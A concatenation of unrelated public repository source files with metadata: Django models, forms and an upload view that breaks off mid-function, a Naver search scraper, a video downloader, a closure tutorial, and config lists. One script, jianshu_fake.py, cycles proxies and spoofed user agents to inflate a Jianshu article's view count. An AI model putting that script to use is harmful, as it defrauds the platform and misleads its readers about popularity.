[L8_2side.ch032_1side_6__2side_4 , L8_3side.ch032_1side_6__2side_4__3side_1 , L8_3side.ch032_1side_6__2side_4__3side_2 , L8_3side.ch032_1side_6__2side_4__3side_3 , L8_3side.ch032_1side_6__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_5 , L8_3side.ch032_1side_6__2side_5__3side_1 , L8_3side.ch032_1side_6__2side_5__3side_2 , L8_3side.ch032_1side_6__2side_5__3side_3 , L8_3side.ch032_1side_6__2side_5__3side_4 , L8_3side.ch032_1side_6__2side_5__3side_5 , L8_3side.empty , ],
[L8_2side.ch032_1side_6__2side_6 , L8_3side.ch032_1side_6__2side_6__3side_1 , L8_3side.ch032_1side_6__2side_6__3side_2 , L8_3side.ch032_1side_6__2side_6__3side_3 , L8_3side.ch032_1side_6__2side_6__3side_4 , L8_3side.ch032_1side_6__2side_6__3side_5 , L8_3side.ch032_1side_6__2side_6__3side_6 , ],
]
########
# 1side_7
########
ch032_1side_7__23side_all = [
[L8_1side.ch032_1side_7 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_1 , L8_3side.ch032_1side_7__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_2 , L8_3side.ch032_1side_7__2side_2__3side_1 , L8_3side.ch032_1side_7__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_3 , L8_3side.ch032_1side_7__2side_3__3side_1 , L8_3side.ch032_1side_7__2side_3__3side_2 , L8_3side.ch032_1side_7__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_4 , L8_3side.ch032_1side_7__2side_4__3side_1 , L8_3side.ch032_1side_7__2side_4__3side_2 , L8_3side.ch032_1side_7__2side_4__3side_3 , L8_3side.ch032_1side_7__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_5 , L8_3side.ch032_1side_7__2side_5__3side_1 , L8_3side.ch032_1side_7__2side_5__3side_2 , L8_3side.ch032_1side_7__2side_5__3side_3 , L8_3side.ch032_1side_7__2side_5__3side_4 , L8_3side.ch032_1side_7__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_6 , L8_3side.ch032_1side_7__2side_6__3side_1 , L8_3side.ch032_1side_7__2side_6__3side_2 , L8_3side.ch032_1side_7__2side_6__3side_3 , L8_3side.ch032_1side_7__2side_6__3side_4 , L8_3side.ch032_1side_7__2side_6__3side_5 , L8_3side.ch032_1side_7__2side_6__3side_6 , L8_3side.empty , ],
[L8_2side.ch032_1side_7__2side_7 , L8_3side.ch032_1side_7__2side_7__3side_1 , L8_3side.ch032_1side_7__2side_7__3side_2 , L8_3side.ch032_1side_7__2side_7__3side_3 , L8_3side.ch032_1side_7__2side_7__3side_4 , L8_3side.ch032_1side_7__2side_7__3side_5 , L8_3side.ch032_1side_7__2side_7__3side_6 , L8_3side.ch032_1side_7__2side_7__3side_7 , ],
]
########
# 1side_8
########
ch032_1side_8__23side_all = [
[L8_1side.ch032_1side_8 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_1 , L8_3side.ch032_1side_8__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_2 , L8_3side.ch032_1side_8__2side_2__3side_1 , L8_3side.ch032_1side_8__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_3 , L8_3side.ch032_1side_8__2side_3__3side_1 , L8_3side.ch032_1side_8__2side_3__3side_2 , L8_3side.ch032_1side_8__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_4 , L8_3side.ch032_1side_8__2side_4__3side_1 , L8_3side.ch032_1side_8__2side_4__3side_2 , L8_3side.ch032_1side_8__2side_4__3side_3 , L8_3side.ch032_1side_8__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_5 , L8_3side.ch032_1side_8__2side_5__3side_1 , L8_3side.ch032_1side_8__2side_5__3side_2 , L8_3side.ch032_1side_8__2side_5__3side_3 , L8_3side.ch032_1side_8__2side_5__3side_4 , L8_3side.ch032_1side_8__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_6 , L8_3side.ch032_1side_8__2side_6__3side_1 , L8_3side.ch032_1side_8__2side_6__3side_2 , L8_3side.ch032_1side_8__2side_6__3side_3 , L8_3side.ch032_1side_8__2side_6__3side_4 , L8_3side.ch032_1side_8__2side_6__3side_5 , L8_3side.ch032_1side_8__2side_6__3side_6 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_7 , L8_3side.ch032_1side_8__2side_7__3side_1 , L8_3side.ch032_1side_8__2side_7__3side_2 , L8_3side.ch032_1side_8__2side_7__3side_3 , L8_3side.ch032_1side_8__2side_7__3side_4 , L8_3side.ch032_1side_8__2side_7__3side_5 , L8_3side.ch032_1side_8__2side_7__3side_6 , L8_3side.ch032_1side_8__2side_7__3side_7 , L8_3side.empty , ],
[L8_2side.ch032_1side_8__2side_8 , L8_3side.ch032_1side_8__2side_8__3side_1 , L8_3side.ch032_1side_8__2side_8__3side_2 , L8_3side.ch032_1side_8__2side_8__3side_3 , L8_3side.ch032_1side_8__2side_8__3side_4 , L8_3side.ch032_1side_8__2side_8__3side_5 , L8_3side.ch032_1side_8__2side_8__3side_6 , L8_3side.ch032_1side_8__2side_8__3side_7 , L8_3side.ch032_1side_8__2side_8__3side_8 , ],
]
########
# 1side_9
########
ch032_1side_9__23side_all = [
[L8_1side.ch032_1side_9 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_1 , L8_3side.ch032_1side_9__2side_1__3side_1 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_2 , L8_3side.ch032_1side_9__2side_2__3side_1 , L8_3side.ch032_1side_9__2side_2__3side_2 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_3 , L8_3side.ch032_1side_9__2side_3__3side_1 , L8_3side.ch032_1side_9__2side_3__3side_2 , L8_3side.ch032_1side_9__2side_3__3side_3 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_4 , L8_3side.ch032_1side_9__2side_4__3side_1 , L8_3side.ch032_1side_9__2side_4__3side_2 , L8_3side.ch032_1side_9__2side_4__3side_3 , L8_3side.ch032_1side_9__2side_4__3side_4 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_5 , L8_3side.ch032_1side_9__2side_5__3side_1 , L8_3side.ch032_1side_9__2side_5__3side_2 , L8_3side.ch032_1side_9__2side_5__3side_3 , L8_3side.ch032_1side_9__2side_5__3side_4 , L8_3side.ch032_1side_9__2side_5__3side_5 , L8_3side.empty , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_6 , L8_3side.ch032_1side_9__2side_6__3side_1 , L8_3side.ch032_1side_9__2side_6__3side_2 , L8_3side.ch032_1side_9__2side_6__3side_3 , L8_3side.ch032_1side_9__2side_6__3side_4 , L8_3side.ch032_1side_9__2side_6__3side_5 , L8_3side.ch032_1side_9__2side_6__3side_6 , L8_3side.empty , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_7 , L8_3side.ch032_1side_9__2side_7__3side_1 , L8_3side.ch032_1side_9__2side_7__3side_2 , L8_3side.ch032_1side_9__2side_7__3side_3 , L8_3side.ch032_1side_9__2side_7__3side_4 , L8_3side.ch032_1side_9__2side_7__3side_5 , L8_3side.ch032_1side_9__2side_7__3side_6 , L8_3side.ch032_1side_9__2side_7__3side_7 , L8_3side.empty , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_8 , L8_3side.ch032_1side_9__2side_8__3side_1 , L8_3side.ch032_1side_9__2side_8__3side_2 , L8_3side.ch032_1side_9__2side_8__3side_3 , L8_3side.ch032_1side_9__2side_8__3side_4 , L8_3side.ch032_1side_9__2side_8__3side_5 , L8_3side.ch032_1side_9__2side_8__3side_6 , L8_3side.ch032_1side_9__2side_8__3side_7 , L8_3side.ch032_1side_9__2side_8__3side_8 , L8_3side.empty , ],
[L8_2side.ch032_1side_9__2side_9 , L8_3side.ch032_1side_9__2side_9__3side_1 , L8_3side.ch032_1side_9__2side_9__3side_2 , L8_3side.ch032_1side_9__2side_9__3side_3 , L8_3side.ch032_1side_9__2side_9__3side_4 , L8_3side.ch032_1side_9__2side_9__3side_5 , L8_3side.ch032_1side_9__2side_9__3side_6 , L8_3side.ch032_1side_9__2side_9__3side_7 , L8_3side.ch032_1side_9__2side_9__3side_8 , L8_3side.ch032_1side_9__2side_9__3side_9 , ],
]
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
ff1e2257ce5005af537692db19e78b2000464a7f
|
c2d130e40bbb5bb3f554b4b76cdac816e4637431
|
/request_handler/RequestRaw.py
|
80810915e1914708d1f413fc0e75349359bf4a3e
|
[] |
no_license
|
tznoordsij4/image-process-site
|
c35c3afa651c43dac60dea3c681393af065f477c
|
7884c59ae87997c7a99ec8418a8d3f69623c0342
|
refs/heads/master
| 2022-11-30T08:07:01.234264
| 2020-08-07T02:27:02
| 2020-08-07T02:27:02
| 269,240,670
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
import requests
from django.core.cache import cache
import random
#Class that takes the raw video src link from video attribute and downloads the video
class RequestRaw:
PATH = 'C:/Users/tznoo/Dev/image_process_site/static/temp_videos/downloaded_video.mp4'
def __init__(self,url,idset,driver_type = 'firefox'):
self.url = url
self.driver_type = driver_type
self.idset = idset
def download_video(self):
resp = requests.get(self.url)
id = RequestRaw.uniqueID(self.idset)
self.PATH = self.PATH.split(".")[0]+id+".mp4"
with open(self.PATH,'wb') as f:
f.write(resp.content)
# cache.add(id, f) cannot cache videos
print("video saved to file %s" % self.PATH)
return id
@staticmethod
def uniqueID(idset):
id = ""
for x in range(16):
id = id + str(random.randint(0,9))
if id in idset:
RequestRaw.uniqueID()
else:
return id
|
[
"tznoordsij@gmail.com"
] |
tznoordsij@gmail.com
|
e654c27d674364446b0b33ca1ab351182be5f2c1
|
9ed013dd2a186a2b417accb7d45053749e953313
|
/scripts/flow/time_resolved/checklist.py
|
ab0dc7589e1caffe0e510dcd2c4df554adf3a923
|
[] |
no_license
|
carlosarceleon/WTN2017_Presentation
|
9675f199ee36f6469cfd47ac4bcfe1faa24934d7
|
076b272e3c9e782800dd596efa02222a962783b3
|
refs/heads/master
| 2021-01-20T06:12:22.319350
| 2017-04-30T15:41:32
| 2017-04-30T15:41:32
| 89,853,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
import collections
checklist = collections.OrderedDict()
checklist[ 'STE_a0_p0_U20_z00_tr' ] = 1
checklist[ 'STE_a12_p0_U20_z00_tr' ] = 1
checklist[ 'STE_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z05_tr' ] = 1
checklist[ 'Sr20R21_a0_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a12_p0_U20_z05_tr' ] = 1
checklist[ 'Sr20R21_a12_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a12_p6_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a12_p6_U20_z05_tr' ] = 0
checklist[ 'Sr20R21_a12_p6_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z05_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a-12_p6_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a-12_p6_U20_z05_tr' ] = 0
checklist[ 'Sr20R21_a-12_p6_U20_z10_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z05_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z10_tr' ] = 1
checklist[ 'Slit20R21_a12_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z05_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z10_tr' ] = 1
|
[
"carlosarceleon@gmail.com"
] |
carlosarceleon@gmail.com
|
48d6bc4a560547ba09d497e180b5e52b9b169c48
|
39b9828edd17169507ab0940f5ffc3899eeecfe7
|
/basketballs/admin.py
|
b2763cdf3b6e6c0acd6a242db9acae5e55825d6f
|
[] |
no_license
|
Nilansha/basketball-league-django-rest-api
|
de6780a2a39b8d96c57712a26b1650d3a070a07b
|
46d88acf4912236fd9073ab166d16dce794b0b2e
|
refs/heads/main
| 2023-06-25T21:51:33.967147
| 2021-07-12T17:11:09
| 2021-07-12T17:11:09
| 385,018,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
from django.contrib import admin
from .models import team,player,match,match_detail,player_point
# Register your models here.
admin.site.register(team.Team)
admin.site.register(player.Player)
admin.site.register(match.Match)
admin.site.register(match_detail.MatchDetail)
admin.site.register(player_point.PlayerPoint)
|
[
"nilanshacas@gmail.com"
] |
nilanshacas@gmail.com
|
669931fd5f01d49f5b460a8e0a064989aedacdc2
|
f946a4ffaa9a9fb849cfac16ce56184366290dfd
|
/employee/forms.py
|
9b7a6b5377e3b06d7fd13c0c80bee6a66127291d
|
[] |
no_license
|
Dharit-shah/Crud
|
85f842529bf2590f9b04d833381c88744eb6e59a
|
de2fdd6bdc3b2e22624c6ca60608774cf1b5ccbf
|
refs/heads/main
| 2023-03-24T18:53:00.440979
| 2021-03-18T07:30:53
| 2021-03-18T07:30:53
| 348,960,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
from django import forms
from .models import Employee
from .models import Product
class EmployeeForm(forms.ModelForm):
class Meta:
model = Employee
fields = "__all__"
class ProductForm(forms.ModelForm):
class Meta:
model = Product
fields = "__all__"
|
[
"dharitvi.dev@gmail.com"
] |
dharitvi.dev@gmail.com
|
734ec78dfed1cd1224f0f1d7b409383e4d0ded76
|
3a823c96f8a88d56aa6a75b7c2db896a27086246
|
/mysite/trips/migrations/0001_initial.py
|
a010fd960406c574833775143e1a4a17f949494b
|
[] |
no_license
|
andreanvictor6374/d3-django
|
8dcc6d4855795ed0e0a1aa75d5a14406d4f59467
|
0820870d53bf3efc18b8a9eab7201613c8663dce
|
refs/heads/master
| 2023-03-17T21:54:30.026125
| 2015-07-31T19:57:01
| 2015-07-31T19:57:01
| 534,475,512
| 1
| 0
| null | 2022-09-09T02:52:41
| 2022-09-09T02:52:41
| null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
('title', models.CharField(max_length=100)),
('content', models.TextField(blank=True)),
('photo', models.URLField(blank=True)),
('location', models.CharField(max_length=100)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"lafei.work@gmai.com"
] |
lafei.work@gmai.com
|
af9fe1544d461c341d7d3020b1612f36c44d6098
|
09beae3af23b61663f1c773c2ae5582bcdb1f382
|
/plots/pyplots3.py
|
6f2b45e42ae3b7eaf97feb1216fe4d7d07addcfc
|
[] |
no_license
|
edurbrito/eat-express-tsp
|
75b9dc5e563232101ae1637a1560e116cbf75e6d
|
1a7543e8efa020af7bb5288dd32e8ddc99bdd412
|
refs/heads/master
| 2023-02-21T06:43:04.107212
| 2021-01-22T23:22:30
| 2021-01-22T23:22:30
| 332,085,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
import matplotlib.pyplot as plt
x = [256, 142, 400, 206, 900, 498]
y1 = [256, 9, 400, 10, 900, 10]
y2 = [256, 20, 400, 17, 900, 26]
plt.scatter(x, y1, marker='o')
plt.savefig("../logs/phase3/connectivity.png")
|
[
"up201806271@fe.up.pt"
] |
up201806271@fe.up.pt
|
15e7b43b15e444edf6aaa55a9b3a08d2f73be6f6
|
5a731188905fac45f62fca7d7745919476259a2f
|
/naver_keyword_search/api_manager.py
|
aab5b194c0ae5605b25102593f4624bfacf8eecb
|
[] |
no_license
|
hhg8840/naver_keyword
|
a2d265bea7e528a9861c4126dac429de937fcc06
|
1bbc40db90aa0af52f266da67016306ef61c499b
|
refs/heads/main
| 2023-08-27T06:09:43.132432
| 2021-10-21T19:07:21
| 2021-10-21T19:07:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,006
|
py
|
import requests
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
import urllib.request
import json
from multiprocessing import Pool
import replace
from naver_keyword_search import function
import hashlib
import logging
logger = logging.getLogger(__name__)
def calculatestar(args):
def calculate(func, args):
result = func(*args)
# print(len(result))
return result
return calculate(*args)
class Naver_api():
def __init__(self, keyword: list, api_key: dict, url: str, kind: list):
self.id = api_key['client_id']
self.secret = api_key['client_secret']
self.content = keyword
self.acumulation = list(zip(self.id, self.secret))
self.processes = 5
self.url = url
self.kind = kind
self.today = datetime.today().strftime("%Y%m%d")
self.now_time = datetime.today().strftime("%H%M%S")
def ragged_chunks(self, seq, chunks):
size = len(seq)
start = 0
for i in range(1, chunks + 1):
stop = i * size // chunks
yield seq[start:stop]
start = stop
def get_keyword(self):
collect = []
for row in self.content:
a = {
'sentence': f"{row['is_str']}, {row['name']}",
'is_str': row['is_str'],
'issn': row['issn'],
'name': row['name'],
'code': row['code'],
}
collect.append(a)
# print(f'total keyword_stkname is {len(collect)} in get_keyword')
return collect
def manipulate(self):
"""
1. first divide a number of chunks of keywords and stock_name
by 5 chunks
2. make a list with api method and api_key dictionary
3.
"""
try:
collect = self.get_keyword()
# print(f'Creating pool with {self.processes} processes')
x = self.ragged_chunks(collect, self.processes)
task = [(self.api,(row, self.acumulation[i], i)) for i, row in enumerate(x)]
with Pool(self.processes) as pool:
a = pool.map(calculatestar, task)
return a
except Exception as err:
logger.error(f'Error happend in manipulate {err}')
def get_info(self, a: dict):
#헤더에 아이디와 키 정보 넣기
headers = {'X-Naver-Client-Id' : a['id'],
'X-Naver-Client-Secret': a['secret']
}
r = requests.get(a['url'], headers=headers)
return r
def api(self, keyword, key, i):
try:
accumulate = []
j = 0
# print(f'{i}th is executing')
for row in keyword:
for k, link in enumerate(self.url):
a={
'id': key[0],
'secret': key[1],
'url': link.format(sent=row['sentence']),
}
signal = self.get_info(a)
if signal.status_code == 429:
continue
# print(f'signal of {row} is {signal}')
resp = signal.json()
if not resp['items']:
# print(f'result of resp{result}')
continue
result = resp['items']
accumulate.append({
'is_str': row['is_str'],
'name': row['name'],
'code': row['code'],
'kind': self.kind[k],
'result': result,
'issn': row['issn'],
})
# j+=1
# print(f'{j}th is executing')
# if j == 10:
# break
# print(f'the count of result of dictionarized data is {len(result)}')
result = self.get_attrebute(accumulate)
return result
except Exception as err:
logger.error(f'{i} th {err}')
def get_attrebute(self, info: list, col=[]):
# print(f'parameter number is {len(info)}')
for row in info:
for r in row['result']:
a = self.get_filter(r['description'], row['is_str'], row['name'])
if not a:
col.extend('')
elif r.get('pubDate'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': function.str_to_date_str(r['pubDate']),
'URL': r['link'],
})
elif r.get('postdate'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': r['postdate'],
'URL': r['bloggerlink'],
})
else:
if r.get('cafeurl'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': None,
'URL': r['cafeurl'],
})
else:
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': None,
'URL': r['link'],
})
return col
def get_filter(self, description, is_str, name):
if (name in description
and is_str in description):
return True
else:
return False
|
[
"pioneer3692@gmail.com"
] |
pioneer3692@gmail.com
|
a0770c8be725bc6e775e9c6ca4caf529c420e522
|
a99b15c87277537c28358e63dde699a9fe5a210b
|
/IncreaseViews/jianshu_fake.py
|
1ddad00437e405e9e058e5f12e642732191f31a2
|
[] |
no_license
|
levinyi/crawler
|
395535a43eaf49c86950c9bada6325cddb3af8e4
|
cc050edb059d0b06111206d4ac33eddf25e1077f
|
refs/heads/master
| 2021-05-12T05:59:38.678308
| 2020-01-19T09:18:26
| 2020-01-19T09:18:26
| 117,208,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,191
|
py
|
import time
import socket
import random
import urllib
socket.setdefaulttimeout(3)
user_agent_list = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
]
f = open("proxy","r")
lines = f.readlines()
proxys = []
for i in range(0, len(lines)):
ip = lines[i].strip("\n").split(",")
proxy_host = 'http://' + ip[0] + ':' + ip[1]
print(proxy_host)
proxy_temp = {"http": proxy_host}
proxys.append(proxy_temp)
urls = [
"https://www.jianshu.com/p/4131fbf8cd3e",
]
j = 1
for i in range(100):
for proxy in proxys:
for url in urls:
try:
user_agent = random.choice(user_agent_list)
proxy_support = urllib.request.ProxyHandler(proxy)
opener = urllib.request.build_opener(proxy_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)
req = urllib.request.Request(url)
c = urllib.request.urlopen(req)
print("successfully", j)
j += 1
time.sleep(5)
except Exception as e:
print(proxy)
print(e)
continue
|
[
"dushiyi319@163.com"
] |
dushiyi319@163.com
|
537aef1a81602cb0e14b2b2c236e8dd4a8ed96af
|
6e705e46faa931f49477335185ade2d68ba97bec
|
/p_chapter05_02.py
|
1ef91c75cadae06b0d086ccb6a4807eb41a922d5
|
[] |
no_license
|
kiyong21c/class_lv2
|
3cbb3ec3e6b09c30f589d1c3b1e4b0140a6659dd
|
d0aba2472da7919d31faa7c4197c063c39ec8ae2
|
refs/heads/master
| 2023-08-16T21:41:43.602174
| 2021-09-29T13:15:33
| 2021-09-29T13:15:33
| 404,745,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
# Chapter05-02
# 일급 함수(일급 객체)
# 클로저 기초
# 파이썬 변수 범위(Scope)
# Ex1
def func_v1(a):
print(a)
print(b)
# func_v1(10) # NameError: name 'b' is not defined
# Ex2
b = 20
def func_v2(a):
print(a)
print(b)
func_v2(10)
# Ex3-1
c = 30
def func_v3(a):
print(a)
print(c) # UnboundLocalError: local variable 'c' referenced before assignment
c = 40
# func_v3(10)
# Ex3-2
c = 30
def func_v3(a):
c = 40
print(a)
print(c) # local variable 'c' 참조
print('>>',c) # global variable 'c' 참조
func_v3(10)
# Ex3-3
c = 30
def func_v3(a):
global c ## 함수내에 global 사용하는것은 추천되는 코딩은 아님
print(a)
print(c) # local variable 'c' 참조
c = 40
print('>>', c) # global variable 'c' 참조
func_v3(10)
print('>>>', c) # global 선언된 'c' 가 참조
# Closure(클로저) 사용 이유
# 서버 프로그래밍 → 동시성(concurrency) 제어 → 같은 메모리 공간에 여러 자원이 접근 → 교착상태(Dead Lock)
# 메모리를 공유하지 않고 메시지 전달로 처리하기 위한 → Erlang
# 클로저는 공유하되 변경되지 않는(Immutable, Read Only) 구조를 적극적으로 사용 → 함수형 프로그래밍
# 클로저는 불변자료구조 및 atom,STM → 멀티스레드(Coroutine) 프로그래밍에 강점
# 함수가 끝났어도 함수 내부의 상태를 기억한다
a = 100
print(a + 100)
print(a + 1000)
# 결과 누적(함수 사용)
print(sum(range(1,51))) # sum 함수
# 클래스 이용
class Averager():
def __init__(self):
self._series = []
def __call__(self, v): # __call__ 매직메소드가 있으면 callable하다 : class를 함수처럼 호출할 수 있음
self._series.append(v)
print('inner >> {} / {}'.format(self._series, len(self._series)))
return sum(self._series) / len(self._series)
# 인스턴스 생성
averager_cls = Averager()
# 누적
print(averager_cls(10)) # 클래스를 함수처럼 실행
print(averager_cls(30)) # 클래스를 함수처럼 실행
print(averager_cls(50)) # 클래스를 함수처럼 실행
# 클래스가 실행되고 난 이후에 .series의 리스트 안에 기억되고 있음 : 클로저의 개념
|
[
"kiyong21c@naver.com"
] |
kiyong21c@naver.com
|
b68bcb6eb6e5671b8e58e91f6d724b097f99c733
|
cd786482154d3a72ef261da2da5e40abfb2cebe0
|
/import_data/views.py
|
fb8aac5b8add33e49c4d9d53c134cd7d1c574acc
|
[] |
no_license
|
B9527/django_data_project
|
4a408592e166f8ae3edd118f3ef452ce21558a81
|
cb5f6696a37c8aebeb1e956b4445d007b062baf9
|
refs/heads/master
| 2021-09-01T02:06:15.055216
| 2017-12-24T10:00:54
| 2017-12-24T10:00:54
| 114,749,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,225
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import datetime
from django.http import HttpResponseRedirect
from django.utils.datastructures import MultiValueDictKeyError
from django.views import View
from django.shortcuts import render, HttpResponse
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from .models import ImportTask, CommandRecord, HiveTable
from .loader import read_excel
# restapi
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
# my error exexption
from utils.erroeException import MyException
# get_or_404
from django.shortcuts import get_object_or_404
from django.db.models import Q
class UploadView(APIView):
def post(self, request, format=None):
return_data = {
"msg": "上传出错,请重新上传!",
"code": 400,
"result": {
}
}
# 读取excel表格信息
post_request_data = self.request.data
configs = []
config_num = 0
try:
format_type = post_request_data['type']
file_obj = post_request_data['file']
if (file_obj.name).split('.')[1] not in ['txt', 'xlsx']:
raise MyException(400, "上传文件类型不对!")
configs = read_excel(file_obj, format_type)
for config in configs:
config_num = config_num + 1
writer = config['writer']
reader = config['reader']
options = config['options']
table_info = config['table_info']
# save hive table and column information
hive_table_args = {"database": table_info['database'], "table_comment": table_info['table_comment'], "table": table_info['table']}
if HiveTable.objects.filter(**hive_table_args).exists():
